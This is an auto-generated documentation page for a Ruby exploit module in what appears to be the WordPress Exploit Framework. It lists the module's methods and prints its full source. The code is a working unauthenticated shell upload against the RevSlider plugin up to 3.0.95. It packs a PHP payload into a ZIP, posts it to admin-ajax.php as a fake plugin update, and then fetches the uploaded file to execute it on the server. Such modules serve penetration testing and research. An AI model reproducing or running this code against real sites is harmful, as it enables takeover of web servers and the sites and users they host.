Class: Wpxf::Exploit::RevsliderShellUpload
- Includes:
- Wpxf
- Defined in:
- lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb
Direct Known Subclasses
AriesRevsliderShellUpload, AvadaRevsliderShellUpload, AwakeRevsliderShellUpload, BeachApolloRevsliderShellUpload, BretheonRevsliderShellUpload, CentumRevsliderShellUpload, ConstructRevsliderShellUpload, DiviRevsliderShellUpload, EchelonRevsliderShellUpload, EleganceRevsliderShellUpload, FusionRevsliderShellUpload, IncredibleWpRevsliderShellUpload, Manbiz2RevsliderShellUpload, MedicateRevsliderShellUpload, MethodRevsliderShellUpload, ModularRevsliderShellUpload, MyriadRevsliderShellUpload, PersuasionRevsliderShellUpload, SeabirdRevsliderShellUpload, ShowbizRevsliderShellUpload, SoulmedicRevsliderShellUpload, StrikingRRevsliderShellUpload, UltimatumRevsliderShellUpload
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
-
#initialize ⇒ RevsliderShellUpload
constructor
A new instance of RevsliderShellUpload.
- #payload_body_builder(payload_name) ⇒ Object
- #plugin_url ⇒ Object
- #run ⇒ Object
- #upload_folder ⇒ Object
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ RevsliderShellUpload
Returns a new instance of RevsliderShellUpload.
6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 6 def initialize super update_info( name: 'RevSlider <= 3.0.95 Shell Upload', desc: 'This module exploits a file upload vulnerability in versions '\ '<= 3.0.95 of the RevSlider plugin which '\ 'allows unauthenticated users to upload and execute PHP scripts '\ 'in the context of the web server.', author: [ 'Simo Ben youssef', # Vulnerability discovery 'rastating' # WPXF module ], references: [ ['EDB', '35385'], ['WPVDB', '7954'], ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'] ], date: 'Nov 26 2014' ) end |
Instance Method Details
#check ⇒ Object
28 29 30 31 32 |
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 28 def check pattern = /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi release_log_url = normalize_uri(plugin_url, 'release_log.txt') check_version_from_custom_file(release_log_url, pattern, '3.0.96') end |
#payload_body_builder(payload_name) ⇒ Object
38 39 40 41 42 43 44 45 |
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 38 def payload_body_builder(payload_name) builder = Utility::BodyBuilder.new zip_fields = { "revslider/#{payload_name}" => payload.encoded } builder.add_zip_file('update_file', zip_fields, 'revslider.zip') builder.add_field('action', 'revslider_ajax_action') builder.add_field('client_action', 'update_plugin') builder end |
#plugin_url ⇒ Object
34 35 36 |
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 34 def plugin_url normalize_uri(wordpress_url_plugins, 'revslider') end |
#run ⇒ Object
51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 51 def run super return false unless check_wordpress_and_online emit_info 'Preparing payload...' payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php" builder = payload_body_builder(payload_name) emit_info 'Uploading payload...' res = nil builder.create do |body| res = execute_post_request(url: wordpress_url_admin_ajax, body: body) end if res.nil? || res.timed_out? emit_error 'No response from the target' return false end if res.code != 200 emit_info "Response code: #{res.code}", true emit_info "Response body: #{res.body}", true emit_error 'Failed to upload payload' return false end if res.body =~ /^0$/ emit_error 'Target not vulnerable or the plugin is deactivated' return false end payload_url = normalize_uri(upload_folder, payload_name) emit_success "Uploaded the payload to #{payload_url}", true emit_info 'Executing the payload...' res = execute_get_request(url: payload_url) if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end return true end |
#upload_folder ⇒ Object
47 48 49 |
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 47 def upload_folder normalize_uri(plugin_url, 'temp', 'update_extract', 'revslider') end |